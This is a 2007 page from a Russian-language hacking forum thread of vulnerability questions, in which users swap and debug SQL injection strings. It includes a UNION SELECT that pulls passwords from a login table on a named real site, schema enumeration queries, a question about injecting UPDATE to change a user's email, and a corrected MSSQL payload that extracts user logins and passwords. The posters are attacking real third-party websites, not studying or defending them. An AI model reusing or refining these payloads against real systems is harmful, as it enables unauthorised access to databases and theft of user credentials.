FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 35 из 2422

Опции темы

Поиск в этой теме

Опции просмотра

24.11.2007, 20:01

5taY3r

Познающий

Регистрация: 10.05.2007

Сообщений: 38

Провел на форуме:
453576

Репутация: 100

Цитата:

Сообщение от Mike 007

Код:

http://www.polimernm.ru/partner.php?pid=-1+union+select+1,pass,user(),6,5+from+login/*

я в этом деле новичок
для чего выкладывают u15691@10.10.10.205 и что оно даёт?
Что делать дальше? как узнать пароль\хеш админа? или юзверя какого нибудь?

Дальше надо прочитать хоть пару статей про sql-inj....

Смотрим таблицы,далее колонки....и будет тебе счастье)

Код:

http://www.polimernm.ru/partner.php?pid=-1+union+select+1,TABLE_NAME,3,4,5+from+INFORMATION_SCHEMA.TABLES+limit+1,1/*

Последний раз редактировалось 5taY3r; 24.11.2007 в 20:08..

24.11.2007, 20:16

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

2Extremal в твоем случае нет, это Mysql, при mysql-inj нельзя использовать две конструкции сразу, в MSSQL можно с помощью ;

2Mike 007 если такой запрос выдаст например root@10.10.10.205, то сразу открываются большие перспективы при использовании sql-inj

__________________
Карфаген должен быть разрушен...

25.11.2007, 06:04

fervex

Новичок

Регистрация: 12.11.2007

Сообщений: 25

Провел на форуме:
36633

Репутация: 3

Здравствуйте!

Есть БД MySQL 5.0.27, уязвимая, кавычки использовать нельзя.
Вид такой:

Код:

.php?id=100+union+select+null,email,null+from+users+where+regID=5/*

Скажите, как к этой строке корректно добавить update+set или нечто подобное, чтобы у юзера с regID=5 изменить значение поля email?

Спасибо!

Последний раз редактировалось fervex; 25.11.2007 в 13:50..

25.11.2007, 06:13

ShAnKaR

Постоянный

Регистрация: 14.07.2005

Сообщений: 964

Провел на форуме:
4646474

Репутация: 1424

в mysql по секурным соображениям нельзя так, вобщем выше написано.

Последний раз редактировалось ShAnKaR; 25.11.2007 в 06:16..

25.11.2007, 13:49

fervex

Новичок

Регистрация: 12.11.2007

Сообщений: 25

Провел на форуме:
36633

Репутация: 3

Цитата:

Сообщение от ShAnKaR

в mysql по секурным соображениям нельзя так, вобщем выше написано.

что, UPDATE никак не получится корректно поставить в запрос? А где "выше написано"?

26.11.2007, 01:25

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

Провел на форуме:
9751379

Репутация: 3812

Отправить сообщение для +toxa+ с помощью AIM

Цитата:

Сообщение от fervex

что, UPDATE никак не получится корректно поставить в запрос? А где "выше написано"?

не получится ибо в подзапросах тока select и после union тоже тока select

Цитата:

Сообщение от 0nep@t0p

Не в этом дело, в mysql через инъекцию изменять информацию в БД нельзя

если инъекция в update, то мона, но это зависит от конкретных условий. Если всё удачно, то мона и файлы читать, и выводить всё чё те надо.

__________________

25.11.2007, 13:55

0nep@t0p

Участник форума

Регистрация: 25.05.2007

Сообщений: 147

Провел на форуме:
2313429

Репутация: 728

Цитата:

что, UPDATE никак не получится корректно поставить в запрос?

Не в этом дело, в mysql через инъекцию изменять информацию в БД нельзя

26.11.2007, 00:48

delay(0)

Участник форума

Регистрация: 22.11.2006

Сообщений: 117

Провел на форуме:
1813343

Репутация: 141

Код:

.asp?id=1+or+1=(SELECT+TOP+1+cast(UserLogin+as+nvarchar)%2B%27%3A%27%2Bcast(UserPassword+as+nvarchar)+from+Users)-

получаю

Цитата:

Microsoft OLE DB Provider for SQL Server error '80040e21'

Line 1: Incorrect syntax near 'cast'.

Что не так?

26.11.2007, 01:42

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Цитата:

Сообщение от delay(0)

Код:

.asp?id=1+or+1=(SELECT+TOP+1+cast(UserLogin+as+nvarchar)%2B%27%3A%27%2Bcast(UserPassword+as+nvarchar)+from+Users)-

получаю

Что не так?

Код:

asp?id=1+or+1=(SELECT+TOP+1+cast(UserLogin+as+nvarchar)+':'+cast(UserPassword+as+nvarchar)+from+Users)--

непонял я для чего ты cast использовал, мож там кавычки %27 фильтруются, да и вобще, нах cast то надо?
если захотел как суперхеккер сделать то можно весь подзапрос в каст взять, но думаю это не обязательно в твоем случае

__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 26.11.2007 в 14:04..

#10

26.11.2007, 11:03

delay(0)

Участник форума

Регистрация: 22.11.2006

Сообщений: 117

Провел на форуме:
1813343

Репутация: 141

Цитата:

если захотел как суперхеккер сделать

Я делал как дядя Cash прописал в своей статье.... Покажи тогда пример запроса.

Страница 35 из 2422

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules